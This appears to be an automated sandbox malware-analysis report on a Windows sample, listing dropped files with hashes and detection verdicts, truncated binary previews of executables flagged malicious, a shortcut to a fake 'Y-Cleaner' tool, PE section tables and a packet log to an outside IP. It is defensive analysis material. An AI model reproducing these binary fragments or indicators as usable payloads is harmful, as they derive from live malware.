                                              SSDEEP:192:U5nAxnQIXpkYjunXgIFtOyoGtodeGVc8EEMfWsKd2GQVnaArwGMZig5UtVEvVhJB:q0nQSkYjxIOfGtoE8E3x7w7f0CrrH
                                              MD5:46FD8590E5BEA1AB50E9E0C8565ED5A6
                                              SHA1:3FD2291915B254DFCAED0E8B0FD6421E37112C55
                                              SHA-256:E86D621B240938CFD50E95C9D71DDE581EE8264D11BADB62FA38F7A585D7F711
                                              SHA-512:FF593E043AAA912ED4DAA3744404CA440F8D877B59A0237C066573E713640421B508CEB1257646CD5E8133EA22DF71C8F824EA21B1BDC21924D5B935C5FB55EF
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8298
                                              Entropy (8bit):3.6925765421311274
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJBCy6k86Y2D6SUsgmfBGW+pD089b6asfocem:R6lXJ56n6YnSUsgmfZi65fT
                                              MD5:5E90B0C7EED310282F545F31D54E4EE0
                                              SHA1:D514B48A9E5C8676F2F250F63B9DC9F81F901E6A
                                              SHA-256:9DFE5141A9967A6AF50701B87202F2A5FEBF96041E5B6FBD17CA06F4F331D078
                                              SHA-512:EBBB87361D182661A3E05E80132CBB51BA95EE06F921DD33246B2A6D253BA51E339CCC6CB1C6DB5F7FD9D82847DF5324D980928421D08AF4E12AF0FC683918A6
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4541
                                              Entropy (8bit):4.432776405848175
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zs6Jg77aI93xjCWpW8VYvYm8M4JBRF7+q82I7kuW1+hd:uIjfII7pxjD7VLJl0HW1+hd
                                              MD5:621164D675259CD49107A1F3DA1E2143
                                              SHA1:2BD0A3954DE5AD16866257A9C98BE1750A6A4EB7
                                              SHA-256:34ED705BD6AD7A360E4EE6E60A3DFECE16DF9D9F688922F12DFCA8DAEDB9E57F
                                              SHA-512:DB57D8A7AA307995EB13DB0F8BC59347B052A3B436E3958BB430BE274073779CD76B4E8858390F87A8E2024BE162473147A7D80C5C3D9DC437EDF56DE3B2E600
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):97296
                                              Entropy (8bit):7.9982317718947025
                                              Encrypted:true
                                              SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                              MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                              SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                              SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                              SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:V:V
                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:0
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):242176
                                              Entropy (8bit):6.47050397947197
                                              Encrypted:false
                                              SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                              MD5:2ECB51AB00C5F340380ECF849291DBCF
                                              SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                              SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                              SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: file.exe, Detection: malicious, Browse
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:V:V
                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                              Malicious:false
                                              Preview:0
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):21
                                              Entropy (8bit):3.880179922675737
                                              Encrypted:false
                                              SSDEEP:3:gFsR0GOWW:gyRhI
                                              MD5:408E94319D97609B8E768415873D5A14
                                              SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                              SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                              SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                              Malicious:false
                                              Preview:9tKiK3bsYm4fMuK47Pk3s
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):1502720
                                              Entropy (8bit):7.646111739368707
                                              Encrypted:false
                                              SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                              MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                              SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                              SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                              SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 75%
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:V:V
                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                              Malicious:false
                                              Preview:0
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):242176
                                              Entropy (8bit):6.47050397947197
                                              Encrypted:false
                                              SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                              MD5:2ECB51AB00C5F340380ECF849291DBCF
                                              SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                              SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                              SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):1502720
                                              Entropy (8bit):7.646111739368707
                                              Encrypted:false
                                              SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                              MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                              SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                              SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                              SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 75%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 13 08:49:17 2024, mtime=Fri Dec 13 08:49:17 2024, atime=Fri Dec 13 08:49:17 2024, length=1502720, window=hide
                                              Category:dropped
                                              Size (bytes):2186
                                              Entropy (8bit):3.824214360947532
                                              Encrypted:false
                                              SSDEEP:48:85LnCGPVDFlZ2RP0vjxwaPvNCgjxmgjx9Z7qgjxxEYyg:85LlFMP0vVNNrLDEYy
                                              MD5:7E0CD192896E8921626E2A96D1E3C70A
                                              SHA1:567ACBDB03FA2B2288362B843FBD7DAE1E361B24
                                              SHA-256:56EAF1F86A1A587275010A3D8506D1963B176626009BE436B6B8669132B220D0
                                              SHA-512:DEC5C0327F9E218474A279BFC4D5F246A4BD1E877CB90C00086D533D20D9982615E6C9DB4CA3A5DE891D21B2F5A681289A69E830809A896512E83B1105F2BC3B
                                              Malicious:false
                                              Preview:L..................F.@.. .....qFDM....qFDM....qFDM..........................6.:..DG..Yr?.D..U..k0.&...&.......$..S...M.{.DM...{{FDM......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.N...........................^.A.p.p.D.a.t.a...B.P.1......Y.N..Local.<......EW<2.Y.N....[.......................}.L.o.c.a.l.....N.1......Y&N..Temp..:......EW<2.Y&N....^.........................T.e.m.p.....r.1......Y&N..F0VWRU~1..Z......Y&N.Y&N..............................F.0.v.w.r.u.C.Z.S.s.W.0.e.e.e.3.v.f.e.0.....h.2......Y)N .Y-CLEA~1.EXE..L......Y)N.Y)N...........................q.Y.-.C.l.e.a.n.e.r...e.x.e.......v...............-.......u..............S.....C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.8.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.F.0.v.w.r.u.C.Z.S.s.W.0.e.e.e.3.v.f.e.0.\.Y.-.C.l.e.a.n.e.r...e.x.e.G.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.F.0.v.w.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.46843083585443
                                              Encrypted:false
                                              SSDEEP:6144:tzZfpi6ceLPx9skLmb0feZWSP3aJG8nAgeiJRMMhA2zX4WABluuNbjDH5S:lZHteZWOKnMM6bFp9j4
                                              MD5:434DAC6F744ECB2F545A5B9662660ABA
                                              SHA1:FF0BC6D1F999A9FF01308767B4B86B0F30E3C1A4
                                              SHA-256:8B9A22D4F8B74717112C1D60537BBD6A485AF85FA6DA564ECC8973E112E61620
                                              SHA-512:741ACD3C73DD071AA7AF1BF8B9ACF13354B3CFFD98A939598D50595C133BC8301EA72E8D9812E0519C0B65173C59CDA7EDB49A3013C58F3AC56638F770351293
                                              Malicious:false
                                              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;.FDM..............................................................................................................................................................................................................................................................................................................................................4..r........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.934588666206335
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:file.exe
                                              File size:1'966'080 bytes
                                              MD5:2e164f8eb316718ae1c48ed84e05dc9f
                                              SHA1:653b1c1598a62782b58e52dd3f2c53355aad94fa
                                              SHA256:323426e01a17e9974e2c710c0708a7232d250a2a7aa815ee7fdfac5f634af0e2
                                              SHA512:4c47f3284fb5220338700b8a86892184fc9956844dd041a88b47d35ebabbb4a70a3922158f02c3f40e594a74f70e6c1f929750404a2b09240535ed7d91dce4a4
                                              SSDEEP:24576:FZjVHfyt/9PRZ9j7d8t0Dls0wnohMQbqzXRqv2ZkA/35YZrPJlGmvrjynr4aAgiH:FZ9G9tfd40adoijcv6WflG4Dnr
                                              TLSH:8295335BD785854FE150CAF3E7BFCEF189115CAC4C2498232A05D33B8A7B665BB02E94
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d...................
                                              Icon Hash:c7a99a8aa651798c
                                              Entrypoint:0xc6b000
                                              Entrypoint Section:.taggant
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x64DDDE0C [Thu Aug 17 08:45:00 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                              Instruction
                                              jmp 00007FC134925E0Ah
                                              pmaxub mm3, qword ptr [00000000h]
                                              add cl, ch
                                              add byte ptr [eax], ah
                                              add byte ptr [eax], al
                                              add byte ptr [ecx], al
                                              or al, byte ptr [eax]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], dh
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add bh, bh
                                              Programming Language:
                                              • [C++] VS2008 build 21022
                                              • [ASM] VS2008 build 21022
                                              • [ C ] VS2008 build 21022
                                              • [IMP] VS2005 build 50727
                                              • [RES] VS2008 build 21022
                                              • [LNK] VS2008 build 21022
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x42105a | 0x6e | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40e000 | 0x12168 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x85ed9c | 0x18 | xzazwoxl |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x40d000 | 0x25400 | 7497aa42cb749cd08500f4dcc9c24a8c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x40e000 | 0x12168 | 0x9400 | 1a403e3e46490d10dd7dd5c12176d28d | False | 0.962864231418919 | data | 7.889233086409241 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x421000 | 0x1000 | 0x200 | de906030ab088402d586a76aa6666758 | False | 0.15234375 | data | 1.0884795995201089 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x422000 | 0x29a000 | 0x200 | 461ad3bff6e997f660f77d5f94f21ac0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| xzazwoxl | 0x6bc000 | 0x1ae000 | 0x1adc00 | bb6ab9a6984ea62aa320f0dbe9e820b4 | False | 0.9849476439790575 | data | 7.94137094600595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| tfoohvpc | 0x86a000 | 0x1000 | 0x600 | 8d439a733ee17a907b23751589df8344 | False | 0.58203125 | data | 5.0583485972495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x86b000 | 0x3000 | 0x2200 | 21ef225e44cb3f644caa1e4d329801f5 | False | 0.06675091911764706 | DOS executable (COM) | 0.7316306225023129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_CURSOR | 0x40e730 | 0x130 | data | | | 1.0361842105263157 |
| RT_CURSOR | 0x40e860 | 0x25a8 | DOS executable (COM, 0x8C-variant) | | | 1.0011410788381743 |
| RT_CURSOR | 0x410e08 | 0xea8 | data | | | 1.0029317697228144 |
| RT_ICON | 0x85edfc | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Syriac | Syriac | 0.3648720682302772 |
| RT_ICON | 0x85fca4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Syriac | Syriac | 0.5063176895306859 |
| RT_ICON | 0x86054c | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Syriac | Syriac | 0.5881336405529954 |
| RT_ICON | 0x860c14 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Syriac | Syriac | 0.619942196531792 |
| RT_ICON | 0x86117c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Syriac | Syriac | 0.3574108818011257 |
| RT_ICON | 0x862224 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Syriac | Syriac | 0.3536885245901639 |
| RT_ICON | 0x862bac | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Syriac | Syriac | 0.40425531914893614 |
| RT_ICON | 0x863014 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Syriac | Syriac | 0.7969083155650319 |
| RT_ICON | 0x863ebc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Syriac | Syriac | 0.8032490974729242 |
| RT_ICON | 0x864764 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Syriac | Syriac | 0.7350230414746544 |
| RT_ICON | 0x864e2c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Syriac | Syriac | 0.7774566473988439 |
| RT_ICON | 0x865394 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Syriac | Syriac | 0.6827800829875519 |
| RT_ICON | 0x86793c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Syriac | Syriac | 0.7293621013133208 |
| RT_ICON | 0x8689e4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Syriac | Syriac | 0.7594262295081967 |
| RT_ICON | 0x86936c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Syriac | Syriac | 0.8111702127659575 |
| RT_DIALOG | 0x41c688 | 0x84 | empty | | | 0 |
| RT_STRING | 0x41c70c | 0x4be | empty | | | 0 |
| RT_STRING | 0x41cbcc | 0xc4 | empty | | | 0 |
| RT_STRING | 0x41cc90 | 0x732 | empty | | | 0 |
| RT_STRING | 0x41d3c4 | 0x7bc | empty | | | 0 |
| RT_STRING | 0x41db80 | 0x5f0 | empty | | | 0 |
| RT_STRING | 0x41e170 | 0x696 | empty | | | 0 |
| RT_STRING | 0x41e808 | 0x7c0 | empty | | | 0 |
| RT_STRING | 0x41efc8 | 0x76a | empty | | | 0 |
| RT_STRING | 0x41f734 | 0x610 | empty | | | 0 |
| RT_GROUP_CURSOR | 0x41fd44 | 0x22 | empty | | | 0 |
| RT_GROUP_CURSOR | 0x41fd68 | 0x14 | empty | | | 0 |
| RT_GROUP_ICON | 0x8697d4 | 0x76 | data | Syriac | Syriac | 0.6779661016949152 |
| RT_GROUP_ICON | 0x86984a | 0x68 | data | Syriac | Syriac | 0.7115384615384616 |
| RT_VERSION | 0x8698b2 | 0x1b8 | COM executable for DOS | | | 0.5704545454545454 |
| RT_MANIFEST | 0x869a6a | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |
| DLL | Import |
| kernel32.dll | lstrcpy |
| Language of compilation system | Country where language is spoken | Map |
| Syriac | Syriac | |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                              Dec 13, 2024 10:48:43.166846037 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.167191029 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.171068907 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.171123028 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.171174049 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.171217918 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.175436974 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.175518036 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.175539970 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.175576925 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.179887056 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.179948092 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.179958105 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.179991961 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.184331894 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.184390068 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.184402943 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.184509039 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.188715935 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.188819885 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.188832045 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.188872099 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.193069935 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.193131924 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.193175077 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.193412066 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.197494030 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.197545052 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.197565079 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.197921038 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.201925039 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.201982021 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.202018023 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.202063084 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.206305981 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.206366062 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.206397057 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.206450939 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.210757971 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.210814953 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.210839033 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.210894108 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.215085030 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.215147972 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.215198040 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.215245962 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.219536066 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.219605923 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.219624043 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.219759941 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.223912001 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.223972082 CET4976180192.168.2.680.82.65.70
